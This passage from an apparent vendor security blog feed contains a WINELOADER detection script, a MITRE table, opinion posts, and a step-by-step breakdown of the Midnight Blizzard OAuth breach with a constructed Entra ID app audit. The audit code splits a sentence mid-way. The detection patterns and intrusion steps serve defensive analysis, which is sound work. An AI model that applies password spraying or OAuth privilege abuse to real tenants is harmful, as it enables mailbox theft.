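    """(host, rule_name) for every rule that fires on any record."""
    return [(r["host"], rule.__name__) for r in records for rule in RULES if rule(r)]


def flag_hosts(records, min_rules=3) -> dict:
    """Hosts on which at least min_rules distinct stages of the chain fired.

    Requiring several stages keeps a lone certutil or tar invocation from
    paging anyone, while the full chain still trips well before persistence.
    """
    per_host = {}
    for host, rule in detect(records):
        per_host.setdefault(host, set()).add(rule)
    return {h: sorted(rs) for h, rs in per_host.items() if len(rs) >= min_rules}


if __name__ == "__main__":
    print(json.dumps(flag_hosts(parse_telemetry(SAMPLE_TELEMETRY)), indent=2))
```

Each rule maps to one stage in the write-up, so a hit list doubles as a timeline of how far the chain progressed on a host; the two persistence rules also match the generic shape (any Run value or task action under C:\Windows\Tasks), not only the MS SQL Writer name.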
MITRE ATT&CK Framework

ID | Tactic | Description
T1204.002 | User Execution: Malicious File | The PDF file that masquerades as an invitation contains a malicious link.
T1656 | Impersonation | The contents of the PDF are crafted to impersonate the Ambassador of India.
T1204.001 | User Execution: Malicious Link | The PDF file contains a link that leads to the download of a malicious ZIP archive.
T1574.002 | Hijack Execution Flow: DLL Side-Loading | sqlwriter.exe is used to DLL side-load vcruntime140.dll.
T1055.001 | Process Injection: Dynamic-link Library Injection | DLL hollowing is used to load a randomly chosen system DLL into sqlwriter.exe process memory and inject WINELOADER in that DLL.
T1573.001 | Encrypted Channel: Symmetric Cryptography | RC4 stream cipher is used to encrypt the data exchanged between WINELOADER and the C2 server.
T1041 | Exfiltration Over C2 Channel | Data is encrypted and exfiltrated to the C2 server.
T1584 | Compromise Infrastructure | Compromised sites are used for hosting payloads and as a C2 server.
T1053.005 | Scheduled Task/Job: Scheduled Task | A scheduled task with the name “MS SQL Writer” is created to ensure sqlwriter.exe is executed to kick-start the infection chain.
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder | WINELOADER can be configured to execute on Windows startup by setting the registry key at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer.
T1140 | Deobfuscate/Decode Files or Information | WINELOADER strings and modules are encrypted with RC4. Sensitive data is often re-encrypted or zeroed out after use.
T1036.001 | Masquerading: Invalid Code Signature | vcruntime140.dll has an invalid Microsoft code signing certificate.
T1036.004 | Masquerading: Masquerade Task or Service | The scheduled task created for persistence masquerades as a legitimate Microsoft scheduled task.
T1027.007 | Obfuscated Files or Information: Dynamic API Resolution | API names are decrypted before they are dynamically resolved and called.
T1027.009 | Obfuscated Files or Information: Embedded Payloads | WINELOADER modules are encrypted with RC4 within vcruntime140.dll and C2 responses.
T1218.005 | System Binary Proxy Execution: Mshta | mshta.exe executes wine.hta, which contains malicious JS downloader code.
T1033 | System Owner/User Discovery | WINELOADER sends the current user and system name in each C2 request.
T1071.001 | Application Layer Protocol: Web Protocols | WINELOADER communicates with its C2 via HTTPS. HTTP GET requests contain a request body that is atypical of such requests.
T1001.001 | Data Obfuscation: Junk Data | WINELOADER prepends a randomized number of junk bytes to the request data before encrypting and sending it to the C2.

Appendix

Below is the full 256-byte RC4 key embedded inside WINELOADER that is used to encrypt and decrypt the information exchanged between the malware and the C2 server.

Tue, 27 Feb 2024 09:32:38 -0800 Sudeep Singh

Why Haven’t Firewalls and VPNs Stopped More Organizations from Being Breached?

Reducing cyber risk is an increasingly important initiative for organizations today. Because a single cyber breach can be financially fatal as well as disastrous for countless stakeholders, improving cybersecurity has become a board-level concern and drawn increased attention from regulatory bodies around the globe. As a result, organizations everywhere have poured massive amounts of time and money into security technologies that are supposed to protect them from cybercriminals’ malicious ends. Specifically, the go-to tools that are deployed in an effort to enhance security are firewalls and VPNs.

Despite the above, breaches continue to occur (and increase in number) at an alarming rate every year. News headlines about particularly noteworthy breaches serve as continual reminders that improperly mitigating risk can be catastrophic, and that the standard tools for ensuring security are insufficient.
One need not look far for concrete examples—the security debacles at Maersk and Colonial Pipeline are powerful, salient illustrations of what can go wrong. With more and more organizations falling prey to our risk-riddled reality, an obvious question arises: Why haven’t firewalls and VPNs stopped more organizations from being breached?

The weaknesses of perimeter-based architectures

Firewalls and VPNs were designed for an era gone by: when users, apps, and data resided on premises; when remote work was the exception; when the cloud had not yet materialized. And in this age of yesteryear, their primary focus was on establishing a safe perimeter around the network in order to keep the bad things out and the good things in. Even for organizations with massive hub-and-spoke networks connecting various locations like branch sites, the standard methods of trying to achieve threat protection and data protection still inevitably involved securing the network as a whole. This architectural approach goes by multiple names, including perimeter-based, castle-and-moat, network-centric, and more.

In other words, firewalls, VPNs, and the architecture that they presuppose are intended for an on-premises-only world that no longer exists. The cloud and remote work have changed things forever. With users, apps, and data all leaving the building en masse, the network perimeter has effectively inverted, meaning more activity now takes place outside the perimeter than within it. And when organizations undergoing digital transformation try to cling to the traditional way of doing security, it creates a variety of challenges. These problems include greater complexity, administrative burden, and cost, as well as decreased productivity and—of primary importance for our topic in this blog post—increased risk.

How do firewalls and VPNs increase risk?

There are four key ways that legacy tools like firewalls and VPNs increase the risk of breaches and their numerous, harmful side effects.
Whether they are hardware appliances or virtual appliances makes little difference.

They expand the attack surface.

Deploying tools like firewalls and VPNs is supposed to protect the ever-growing network as it is extended to more locations, clouds, users, and devices. However, these tools have public IP addresses that can be found on the internet. This is by design so that the intended users can access the network via the web and do their jobs, but it also means that cybercriminals can find these entry points into the network and target them. As more of these tools are deployed, the attack surface is continually expanded, and the problem is worsened.

They enable compromise.

Organizations need to inspect all traffic and enforce real-time security policies if they are to stop compromise. But about 95% of traffic today is encrypted, and inspecting such traffic requires extensive compute power. Appliances have static capacities to handle a fixed volume of traffic and, consequently, struggle to scale as needed to inspect encrypted traffic as organizations grow. This means threats are able to pass through defenses via encrypted traffic and compromise organizations.

They allow lateral threat movement.

Firewalls and VPNs are what primarily compose the “moat” in a castle-and-moat security model. They are focused on establishing a network perimeter, as mentioned above. Relying on this strategy, however, means that there is little protection once a threat actor gets into the “castle,” i.e., the network. As a result, following compromise, attackers can move laterally across the network, from app to app, and do extensive damage.

They fail to stop data loss.

Once cybercriminals have scoured connected resources on the network for sensitive information, they steal it. This typically occurs via encrypted traffic to the internet, which, as explained above, legacy tools struggle to inspect and secure.
Similarly, modern data leakage paths, such as sharing functionality inside of SaaS applications like Box, cannot be secured with tools designed for a time when SaaS apps did not exist.

Why zero trust can stop organizations from being breached

Zero trust is the solution to the above problems. It is a modern architecture that takes an inherently different approach to security in light of the fact that the cloud and remote work have changed things forever, as described earlier. In other words, zero trust leaves the weaknesses of perimeter-based, network-centric, firewall-and-VPN architectures in the past. With an inline, global security cloud serving as an intelligent switchboard to provide zero trust connectivity (along with a plethora of other functionality), organizations can:

- Minimize the attack surface: Hide applications behind a zero trust cloud, eliminate security tools with public IP addresses, and prevent inbound connections
- Stop compromise: Leverage a high performance cloud to inspect all traffic at scale, including encrypted traffic, and enforce real-time policies to stop threats
- Prevent lateral movement: Connect users, devices, and workloads directly to apps they are authorized to access instead of connecting them to the network as a whole
- Block data loss: Prevent malicious data exfiltration and accidental data loss across all data leakage paths, including encrypted traffic, cloud apps, and endpoints

In addition to reducing risk, zero trust architecture solves problems related to complexity, cost, productivity, and more.
If you would like to learn more about zero trust, join our upcoming webinar, “Start Here: An Introduction to Zero Trust.” Or, if you would like to dive deeper on the weaknesses of yesterday’s tools, read our new ebook, “4 Reasons Firewalls and VPNs Are Exposing Organizations to Breaches.”

Tue, 27 Feb 2024 08:04:02 -0800 Jacob Serpa

AI-Powered Sales Leadership: Transforming the Playbook for World-Class Coaching

We are in an era of change brought about by AI. There’s a lot of positivity but also uncertainty. For sales leaders, the advent of artificial intelligence (AI) presents an opportunity to rewrite the playbook for optimising our impact across our whole team. There’s an opportunity to capitalise on the processing power of AI to amplify sales leaders’ experience and talent.

Currently, I have the privilege of running our sales leadership enablement in EMEA at Zscaler, and advising external GTM leaders. I’ve also been doing some independent research into AI. As such, I have developed a good understanding of the current challenges sales teams face and how AI could assist us in being more effective leaders in the future.

Current State: Human-Powered Sales Forecasting

In sales, managing the forecast is one of the key challenges for leaders. Managing the forecast today can mean getting intimately involved in as many deals as possible so that you can spot risk, coach the people involved, and drive the right actions and urgency directly. This approach has, in the past, worked effectively at delivering the forecast, but with clear drawbacks: inconsistency, time drain, and inability to scale. Sometimes referred to as the “hero” approach, “saving” deals can be exhausting for leaders and can unintentionally create a micro-management style of culture that can lead to other challenges. In addition, a sales leader can only focus on a few key deals at a time, sometimes sacrificing support for the vast majority.

The Data Dilemma

Sales leaders are not data analysts.
Currently, they are expected to review large amounts of performance data constructively, extract the necessary insights efficiently, and translate these insights into coaching opportunities for their salespeople. Traditionally, we use leading indicators to help us understand what activities will deliver success for our salespeople and sales leaders. These are powerful metrics that shape the weekly and quarterly operating cadence for our teams. These leading indicators are manual inputs, e.g.:

- Number of new business meetings
- Number of opportunity progression meetings
- Proof of values
- Pipeline coverage, etc.

Leading indicators have always been very important because we need a scalable way of measuring how to protect the business now and in the future. However, what every good sales leader knows is that for each person, business unit, region, and market, there are always discrepancies based on the skill of the individual, their tenure, the market, the culture of the region, etc. Therefore, it becomes challenging to cater for these nuances at scale and the manual inputs can feel limited. In an age when we can develop deeper insights, imagine if we could tailor-make leading indicators that are fit for each individual, team, or region.

The human-powered playbook for sales leaders stops working at scale

As the needs of our employees change and the metrics for success remain constant, there is an opportunity to evolve this traditional playbook, looking toward new tools for assistance. Specifically, AI can help us to scale our ability to coach our people, understand potential business risks, and deliver for the business.

Future State: AI-Assisted Analysis & Insights to Optimise Sales Coaching

The charter for sales leadership has always been about prioritising their people – putting them before the deal and providing the right tools to be successful. Now we have an opportunity to expand our coaching at scale using data to guide us to the right areas of focus.
There is a huge opportunity for sales leaders to develop their management style and transition from being dealmakers to being transformative coaches, assisted by AI. You may have heard of the term “Building a Second Brain,” coined by Tiago Forte:

“Building a Second Brain is a methodology for saving and systematically reminding us of the ideas, inspirations, insights, and connections we’ve gained through our experience … . A Second Brain ultimately expands our memory and our intellect using modern tools of technology.”

AI presents the potential to serve as a second brain, helping bridge the gap between a sea of data and having effective coaching conversations. Ultimately, helping leaders scale. For instance, imagine an AI tech stack that can help us ingest the sea of data across deals, learn the patterns and trends across the entire GTM salesforce, benchmark the performance data against the norm, trend this information and tailor it at scale for specific individuals, then create intuitive, human-like written insights that are easy for sales leaders to understand in the moment so that they can coach their team effectively on where to focus their time and energy. AI could finally be the technology that can help sales leaders develop insights from the pool of performance data in real time so that they can deliver impactful coaching for their people.

I’m privileged to be a part of this game-changing transformation. It’s an exciting time for all sales leaders if we adapt and evolve the way we think and behave. This topic is top of mind for myself and the other sales leaders at Zscaler and across industries. I welcome you to join the conversation, perhaps by responding to this prompt: How can AI help us rewrite the Sales Leader playbook, and help us become world class coaches? If you’re interested in learning more about the advancements we’re driving and the opportunities for growth within Zscaler’s sales organisation, please DM me directly to begin the conversation.
Thu, 22 Feb 2024 07:29:08 -0800 Jason Creane

The old social engineering playbook – Now with AI!

When you’ve been in the security world long enough, you start to see old playbooks being reused, with new technology. Case in point: ‘Deepfake’ has been an increasingly common phrase in the news, describing digitally manipulated video being used to misrepresent a person or falsify identity. The latest example of deepfake targeting, where a successful video call resulted in a 25 million USD money transfer, captured people’s attention for a number of reasons. The main news value was in the enormous amount of money that the attackers were able to steal by faking a single video call. In itself, the technical playbook used to trick the person was nothing new. However, this deepfake example demonstrated once again just how high a level of sophistication is possible when AI is orchestrated creatively.

People generally fear a relatively new technology, like AI, because they can’t immediately grasp its full potential and they have a fear of the unknown. Similarly, technological advancements also scare people when they feel like they pose a threat to their sense of security or working lives, such as losing their jobs to AI. The social engineering techniques used by adversaries have continuously evolved and usually these adversaries are faster to adopt new technologies for their benefit than we, the defenders, are to protect their victims. You can see examples of this in the not too distant past:

- In times of modem connectivity, a common piece of malware would dial up a modem in the middle of the night and connect it to a toll number, leading to enormous bills.
- A few years ago, a rash of malicious Android apps hacked mobile phones to dial toll numbers as a way to make quick and easy money – which was basically a modern form of the old modem dialer tactic.
- Cryptominers harvesting the compute powers of infected systems was then the next step in this evolution.
The human risk factor

History has shown us a number of examples of the old social engineering playbook in use. The technique of faking a senior executive’s voice by reusing publicly available audio clips to threaten users into taking action is already fairly well known. Faking video sessions showing a range of people in a live and interactive call, however, reaches a new (and scary) level of cybercriminal sophistication and has therefore sown a new level of appropriate and respectful fear around AI’s technological evolution. It is the perfect demonstration of how easily humans can be tricked or coerced into taking action – and of bad actors using this to their advantage. But this attack also highlights how a new piece of technology can enable adversaries to do the same tasks they have been doing before, but more efficiently. And bad guys are taking advantage of this technological advancement fast.

Unfortunately, the general public is still not fully aware of how social engineering techniques continue to evolve. They don't follow security news and trust that these kinds of attacks will never happen to them. This is what makes traditional security awareness training difficult to prove effective: the public doesn’t believe they (as individuals) will be targeted. So when it does happen, they are unprepared and are duped into falling prey to the social engineering attack.

In the wake of this recent attack questions were also raised about how – if AI is really good enough to make these video scenarios look so realistic – an employee would have any chance of detecting the fake. The fact is that human beings are not machines, and they will always be a risk factor as an organisation’s first line of defence because they will have a variable level of security awareness (no matter how good the internal training process might be). Imagine if someone has a bad night or returns home late from a business trip or sports event.
They simply might not be as laser-focused on detecting modern social engineering techniques, or paying attention to the details, the following day. The big challenge is that AI will not have an off day; its targeting remains consistent.

The technology to fight these playbooks already exists – but it is not widely used

The fact that these kinds of plays keep working shows that businesses have not yet adapted their security and organisational processes to handle them. One way to counteract deepfake videos starts at the (security) process level. My first idea is a simple one: ensure that teleconferencing systems include a function to authenticate a logged-on user as a human being. A straightforward plug-in could do the job, employing two-factor authentication to verify an identity within Zoom or Teams, for example. Such an API would hopefully be fairly easy to develop and would be a huge step forward in preventing impersonation attacks over the phone as well.

Additionally, the mindset of being afraid of AI has to change. It is an amazing piece of technology, not only when it is misused; society just needs to understand its boundaries. AI can actually be used to stop these sorts of modern attacks if security executives learn how to control the problem and use the technology to get ahead of the bad actors. Deception technologies already exist, and AI can be used to detect anomalies much faster and more effectively, showing its potential for good.

From a broader security perspective, adopting a Zero Trust mentality enables organisations to continually improve their security posture at the process level. Zero Trust can help not only at the connectivity level but also in security workflows, for example by verifying that everyone in a call is authenticated against an internal directory. Zscaler's Identity Threat Detection and Response (ITDR) already mitigates threats that target a user's identity.
With the help of this service, the risk to identities becomes quantifiable, misconfigurations are detected, and real-time monitoring of privilege escalation helps to prevent breaches.

Finally, going back to the initial example of the successful deepfake: it is hard to believe that so much money can be transferred in a modern organisation without verification processes operating in the background. Organisations would be well advised to check the overall risk level of such processes within their own infrastructure. Solid administrative processes that reduce risk, not only in the security organisation but in operational processes such as payment authorisation, would raise the barriers to attack greatly. Not everything needs a technological solution. Sometimes a new procedure under which two people must sign off on a funds transfer is the step that protects the organisation from losing 25 million USD.

Tue, 20 Feb 2024 05:54:06 -0800 James Tucker

NIS 2.0 - New Cybersecurity Rules In the EU

Back in 2021, the White House issued an executive order compelling federal government agencies to develop a plan for implementing a zero trust architecture. This was followed by a memorandum that mandated federal agencies to achieve specific zero trust security goals by the end of fiscal year 2024. Last year, as you may have heard, the SEC in the United States issued new rules compelling publicly traded companies to disclose material cybersecurity breaches. As it happens, the SEC has wasted no time in showing that its regulations have teeth, with the first enforcement actions having already taken place. So there is a lot going on in the USA, but it is not the only place in the world where policymakers are pushing for, or even mandating, the adoption of zero trust principles.
This year the European Union is updating and tightening its Network and Information Systems (NIS) directive, and as anyone who experienced the arrival of the GDPR privacy regulation will tell you, the reach of EU regulation can be great indeed.

NIS 2.0

EU member states must transpose the NIS 2.0 directive into national law by 17 October 2024. It mandates that management bodies of organizations in specific categories implement cybersecurity risk management measures. The impacted categories extend to:

- Energy
- Transport
- Banking
- Financial market infrastructure
- Health
- Drinking water
- Wastewater
- Digital infrastructure
- ICT service management (B2B)
- Public administration
- Space
- Postal and courier services
- Waste management
- Manufacture, production and distribution of chemicals
- Food production, processing and distribution
- Manufacturing
- Digital providers
- Research

As you can see, the directive is focused on critical physical and digital infrastructure within EU member states, but it also has reach: it applies not only to organizations within the EU but also to organizations worldwide that provide services to the protected sectors within the EU. As with the SEC regulations, there are strict rules for prompt incident reporting.

The stick

The picture is abundantly clear at this point. Government bodies in regions covering hundreds of millions of citizens have recognized that the risk of inadequate cybersecurity practices is severe enough to warrant strict regulation and severe penalties. The carrot has been in place for many years; now comes the stick.

The carrot

So, what is the carrot? What are the positive aspects of strengthening your security defenses? It starts with reducing cyberattack risk and achieving compliance, but what else? Organizations that implement robust cybersecurity practices stand to gain significantly in cost reduction, competitiveness, business continuity and customer trust. Not just one carrot, but a whole bunch!

Help is at hand.
The NIS 2.0 directive itself includes clear guidance on how to improve your cybersecurity stance, and you will not be surprised to learn that the first recommended cyber hygiene practice listed is the adoption of zero trust principles. In fact, as you review these lengthy regulatory and legal requirements, zero trust comes up routinely as the holy grail to aim for: "Users should log into applications, rather than networks."

Help is also available from Zscaler, where we have been designing and building the foundational pillars of a zero trust architecture since 2007. If you would like to speak to someone about implementing zero trust and achieving regulatory compliance, whatever your industry, please get in touch. Alternatively, join one of our monthly introductory webinars to learn more and ask questions. Click here and search "start here" to find the next session to sign up for.

Tue, 20 Feb 2024 00:00:02 -0800 Simon Tompson

Microsoft, Midnight Blizzard, and the Scourge of Identity Attacks

Summary

On January 19, 2024, Microsoft disclosed that it had fallen victim to a Russian state-sponsored cyberattack that gave the threat actors access to senior management mailboxes and resulted in sensitive data leakage. We break down the attack step by step below and explain what organizations can do to defend against similar attacks; first, the TL;DR.

The threat actor
- Midnight Blizzard: state-sponsored Russian threat actor, also known as Nobelium, Cozy Bear, and APT29
- Notable Midnight Blizzard breaches: Hewlett Packard Enterprise (December 12, 2023) and SolarWinds (December 14, 2020)

The facts
- Attack target: Microsoft's Entra ID environment
- Techniques used: password spraying, exploitation of identity and SaaS misconfigurations
- Impact: compromised Entra ID environment; unauthorized access to the email accounts of Microsoft's senior leadership team, security team, legal team, and more

What's unique about the attack?
- Stealthy identity tactics that bypass existing defenses to compromise users
- Exploitation of misconfigurations in SaaS applications to gain privileges
- Exploitation of identity misconfigurations in Entra ID to escalate privileges

The attack sequence
1. Found a legacy, non-production test tenant in Microsoft's environment.
2. Used password spraying via residential proxies to attack the test tenant.
3. Limited the number of attempts to stay under the threshold and evade the blocking triggered by brute-force heuristics.
4. Guessed the right password and compromised the test tenant's account.
5. Generated a new secret for the test app (called TestApp below), which allowed the threat actor to control the app everywhere it was installed. TestApp was also present in the corporate tenant.
6. Used the app's permissions to create an admin user in the corporate tenant.
7. Used the new admin account to create malicious OAuth apps.
8. Granted the malicious apps the privilege to impersonate users of the Exchange service.
9. Used the malicious apps to access Microsoft employee email accounts.

Microsoft's official guidance
Defend against malicious OAuth applications:
- Audit privileged identities and apps in your tenant
- Identify malicious OAuth apps
- Implement conditional access app control for unmanaged devices
Protect against password spray attacks:
- Eliminate insecure passwords
- Detect, investigate, and remediate identity-based attacks
- Enforce multi-factor authentication and password protections
- Investigate any possible password spray activity

Zscaler's guidance
- Continuously assess SaaS applications for misconfigurations, excessive permissions, and malicious changes that open up attack paths.
- Continuously assess Active Directory and Entra ID (previously known as Azure AD) for misconfigurations, excessive permissions, and malicious changes that open up attack paths.
- Monitor users with risky permissions and misconfigurations for malicious activity such as DCSync, DCShadow, and Kerberoasting that is typically associated with an identity attack.
- Implement containment and response rules to block app access, isolate the user, or quarantine the endpoint when an identity attack is detected.
- Implement deception to detect password spraying, Entra ID exploitation, Active Directory exploitation, privilege escalation, and lateral movement in cases where stealthy attacks bypass existing detection and monitoring controls.

Deconstructing the attack

The threat actor
Midnight Blizzard has a long history of pulling off highly publicized breaches. It is Microsoft this time around, but in the past the group has allegedly compromised Hewlett Packard Enterprise and SolarWinds. To people who analyze attacks for a living, the Microsoft breach should not come as a surprise. Midnight Blizzard is among a growing list of nation-state and organized threat actors that rely on identity compromise, and on exploiting misconfigurations and permissions in SaaS applications and identity stores, to execute breaches that conventional security thinking cannot defend against. Other threat groups using these strategies and techniques include Evil Corp, Lapsus$, BlackMatter, and Vice Society.

In the case of the Microsoft breach, the attackers demonstrated a profound understanding of OAuth mechanics and of techniques to evade detection controls. They created malicious applications to navigate Microsoft's corporate environment, and by manipulating OAuth permissions they granted themselves full access to Office 365 Exchange mailboxes, enabling them to exfiltrate sensitive emails with ease.

Security challenges
- Identity-centric tactics: Midnight Blizzard strategically targeted identities, using a user's credentials as the gateway to sensitive data. Conventional detection controls like EDR are not effective against such attacks.
- OAuth application abuse: the adversaries adeptly abused OAuth applications, a technique that complicates detection and enables prolonged persistence.
- Misconfiguration blind spots: identifying misconfigurations within Active Directory/Entra ID and SaaS environments remains a complex task, often leaving blind spots for defenders.

Step-by-step breakdown

Pre-breach
Before the attack commenced, an admin within Microsoft's test tenant had created an OAuth app. For the purpose of this blog post, let's call this app "TestApp." For reasons unknown, this app was subsequently installed in Microsoft's corporate environment with elevated permissions, likely encompassing the Microsoft Graph permission Directory.ReadWrite.All, which would give it the capability to create users and assign roles. Notably, this app appeared to be dormant and possibly forgotten.

ThreatLabz note: There is an unimaginable sprawl of applications, users, and associated misconfigurations and permissions that security teams often have no visibility into. More often than not, blind spots like these are what result in publicized breaches.

Initial access
In late November 2023, Midnight Blizzard began reconnaissance of Microsoft's SaaS environment. Having discovered the test tenant, the attacker targeted its admin account which, being a test account, had a weak, guessable password and lacked multi-factor authentication (MFA). Employing a password spraying attack, the attacker systematically attempted common passwords, using residential proxies to obfuscate their origin and minimize suspicion. Eventually, the attacker compromised the admin account.

ThreatLabz note: Traditional threat detection and monitoring controls are ineffective against attacks that use valid credentials, MFA prompt bombing, and other identity-centric techniques to compromise users.

Persistence
With control over the admin account, the attacker was able to generate a new secret for TestApp, effectively commandeering it across all installations. This tactic mirrors techniques observed in the SolarWinds attack of 2020.

ThreatLabz note: In the absence of continuous monitoring and high-confidence alerting for malicious changes to the permissions and credentials of SaaS applications, attacks like these easily cross the initial access phase of the kill chain.

Privilege escalation
Given TestApp's permissions within Microsoft's corporate tenant, the attacker created a new user, likely an administrator, to further their access. Subsequently, the attacker deployed additional malicious OAuth apps within the tenant to evade detection and ensure persistence, using TestApp to grant them elevated roles such as the Exchange role EWS.full_access_as_app. That role permits access to any mailbox and, because an app-only token is obtained with the app's own credential and no user ever signs in, it sidesteps MFA protection entirely.

ThreatLabz note: Configuration and permission blind spots extend to identities themselves. Organizations must therefore be able to continuously assess their Active Directory/Entra ID for misconfigurations, excessively permissive policies, and other permissions that let an attacker escalate privileges from a compromised identity. They should also continuously monitor for malicious changes in the identity store that may be creating additional attack surface.

Lateral movement
Though specifics regarding the number and origin of the installed apps remain unclear, the attacker's use of TestApp to confer privileges is evident. This culminated in unauthorized access to mailboxes belonging to Microsoft's senior leadership, security personnel, legal team, and other stakeholders.

How zero trust can help
A zero trust architecture provides a fundamentally more secure approach that is better at protecting against the stealthy attacks used by nation-state threat actors and organized adversaries. Zero trust eliminates weaknesses in your environment that are core properties of hub-and-spoke network models.
Below is a 10,000-foot reference architecture for zero trust that explains how and why it better protects against Midnight Blizzard-style attacks.

Core zero trust capabilities
This is the heart of a zero trust architecture, consisting of Internet Access and Private Access. The Zero Trust Exchange acts as a switchboard brokering all connections between users and applications. This architecture makes your applications invisible to the Internet, eliminating the external attack surface, replaces high-risk VPNs, and uses segmentation to reduce lateral threat movement and internal blast radius. To broker a connection, the Zero Trust Exchange verifies the identity, determines the destination, assesses risk, and enforces policy.

ThreatLabz note: Zscaler extends core zero trust capabilities with SaaS supply chain security, Identity Posture Management, ITDR, Deception, and Identity Credential Exposure to eliminate application and identity misconfigurations, detect stealthy attacks, and provide visibility into exposed credentials on endpoints in order to remove lateral movement paths. Below, we break down what each of these capabilities can do.

SaaS Security
While the move to the cloud and SaaS applications has helped organizations accelerate their digital transformation, it has also created a new set of security challenges. Chief among these is the lack of visibility into dangerous backdoor connections to SaaS applications, which creates supply chain risk of the kind exploited in the Microsoft breach. SaaS Security strengthens your security posture by providing visibility into third-party application connections, over-privileged access, and risky permissions, together with continuous monitoring for changes that may be malicious in nature. It is a core step in securing your SaaS environment.

Identity Posture Management
Nine in ten organizations are exposed to Active Directory attacks, and there was a 583% increase in Kerberoasting and similar identity attack techniques in 2023 alone. These are not isolated phenomena: misconfigurations and excessive permissions in Active Directory and other identity providers are what enable these attacks. For example, an unprivileged account without MFA that can control an application holding privileged roles should be flagged, but most security teams lack visibility into misconfigurations of this type. Identity Posture Management augments zero trust by giving security teams visibility into identity misconfigurations, policies, and permissions that open up potential attack paths. With periodic assessments, security teams can use remediation guidance to revoke permissions, tighten policies, and remove misconfigurations. Identity Posture Management also alerts security teams to malicious changes in Active Directory in real time.

Deception and ITDR (Identity Threat Detection and Response)
As the Microsoft breach shows, attackers used password spraying from residential proxies and limited the number of attempts to evade detection. Traditional threat detection and monitoring approaches simply do not work here. Deception, on the other hand, is a pragmatic approach that detects these attacks with high confidence: decoy users created in Entra ID detect password spraying without false positives or the need to write complex detection rules, because no legitimate process ever has a reason to sign in as a decoy. ITDR can detect identity-specific attacks like DCSync, DCShadow, and Kerberoasting that would otherwise require detection engineering and significant triage to spot.

Identity Credential Exposure
While TTPs (Tactics, Techniques, and Procedures) were not reported for credential exploitation, credentials and other sensitive material (usernames, passwords, authentication tokens, connection strings, etc.)
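The SaaS posture checks described above can be made concrete. What follows is an added example written for this page, not Microsoft's or Zscaler's code: a Python audit over a constructed inventory of Entra ID app registrations that flags the conditions which made the TestApp chain possible. It looks for app-only grants of the permissions the write-up names (Directory.ReadWrite.All and the Exchange full_access_as_app / EWS.AccessAsUser.All scopes, plus RoleManagement.ReadWrite.Directory, the Graph permission for assigning directory roles, added here as a related check), for apps carrying more than one client secret (a fresh secret added to a forgotten app is the persistence step above), for unverified publishers, and for privileged apps that have not signed in for a long time. The record layout is a simplified, hypothetical stand-in for what Microsoft Graph returns for applications and service principals; the field names, the 90-day dormancy threshold and the sample inventory are assumptions constructed for the example.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import List, Optional

# App-only permissions named in the write-up as the ones abused in this chain,
# plus RoleManagement.ReadWrite.Directory (role assignment), added for completeness.
HIGH_RISK_APP_PERMISSIONS = {
    "Directory.ReadWrite.All",
    "RoleManagement.ReadWrite.Directory",
    "full_access_as_app",          # Exchange Online EWS: every mailbox, no user, no MFA
    "EWS.AccessAsUser.All",
}
DORMANT_AFTER = timedelta(days=90)  # assumption: 90 days without a sign-in counts as dormant


@dataclass
class AppRecord:
    """Simplified, hypothetical shape of an app registration plus its service principal."""
    app_id: str
    display_name: str
    app_permissions: List[str]        # application (app-only) permissions granted
    secret_count: int                 # live client secrets (passwordCredentials)
    publisher_verified: bool
    last_sign_in: Optional[datetime]  # last app-only sign-in; None = never observed


@dataclass
class Finding:
    app_id: str
    display_name: str
    reasons: List[str] = field(default_factory=list)


def audit_apps(apps: List[AppRecord], now: datetime) -> List[Finding]:
    """Return one Finding per app that matches any risky condition.

    Dormancy alone is noise; dormancy combined with high-risk permissions is the
    forgotten, admin-capable TestApp the attackers found, so only that pairing is
    reported as a dormant privileged app.
    """
    findings: List[Finding] = []
    for app in apps:
        reasons: List[str] = []
        risky = sorted(set(app.app_permissions) & HIGH_RISK_APP_PERMISSIONS)
        if risky:
            reasons.append(f"high-risk app-only permissions: {', '.join(risky)}")
        if app.secret_count > 1:
            reasons.append(f"{app.secret_count} client secrets (possible added credential, T1098.001)")
        if not app.publisher_verified:
            reasons.append("unverified publisher")
        dormant = app.last_sign_in is None or now - app.last_sign_in > DORMANT_AFTER
        if risky and dormant:
            reasons.append("dormant privileged app (no sign-in for more than 90 days)")
        if reasons:
            findings.append(Finding(app.app_id, app.display_name, reasons))
    return findings


# Constructed inventory: a forgotten test app mirroring the TestApp story, a healthy
# line-of-business app, and an actively used app holding an Exchange EWS grant.
NOW = datetime(2024, 1, 19, tzinfo=timezone.utc)
SAMPLE_APPS = [
    AppRecord("11111111-0000-0000-0000-000000000001", "TestApp",
              ["Directory.ReadWrite.All"], secret_count=2, publisher_verified=False,
              last_sign_in=NOW - timedelta(days=400)),
    AppRecord("11111111-0000-0000-0000-000000000002", "HR-Sync",
              ["User.Read.All"], secret_count=1, publisher_verified=True,
              last_sign_in=NOW - timedelta(days=1)),
    AppRecord("11111111-0000-0000-0000-000000000003", "MailArchiver",
              ["full_access_as_app"], secret_count=1, publisher_verified=True,
              last_sign_in=NOW - timedelta(hours=2)),
]

if __name__ == "__main__":
    for f in audit_apps(SAMPLE_APPS, NOW):
        print(f"{f.display_name} ({f.app_id}):")
        for r in f.reasons:
            print(f"  - {r}")
```

Run against the constructed inventory, TestApp is reported on all four counts while MailArchiver is reported only for its mailbox-wide permission; the latter is still worth a look, because an app-only Exchange grant is exactly what the attackers gave their malicious apps, but it is a different conversation from an abandoned app nobody owns.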
on the endpoint in files, the registry, and other caches are something that threat actors like Volt Typhoon, Scattered Spider, BlackBasta, BlackCat, and LockBit are known to have exploited in publicly reported breaches. Identity Credential Exposure gives security teams visibility into credential exposure across their endpoint footprint, highlighting blind spots that open up lateral movement and data access paths from the endpoint.

Zero trust creates multiple opportunities to detect and stop Midnight Blizzard-style attacks

Problem: Password spraying
Solution: Zscaler Deception
How does it work? Decoy user accounts in Entra ID detect any attempt to sign in with the decoy users' credentials. Any failed or successful attempt is logged, which exposes attacks like password spraying.
MITRE ATT&CK: T1110.003 - Brute Force: Password Spraying; T1078.004 - Valid Accounts: Cloud Accounts

Problem: Existence of apps/SPNs with high privilege
Solution: Zscaler ITDR
How does it work? ITDR surfaces unprivileged accounts that have a path (e.g., owner rights) to apps with privileged roles.
MITRE ATT&CK: N/A

Problem: Creation of apps/SPNs with high privilege
Solution: Zscaler SaaS Security
How does it work? Monitors for and alerts when a risky app is added, when an app is created by an unverified publisher, and when an app has not been used in a while.
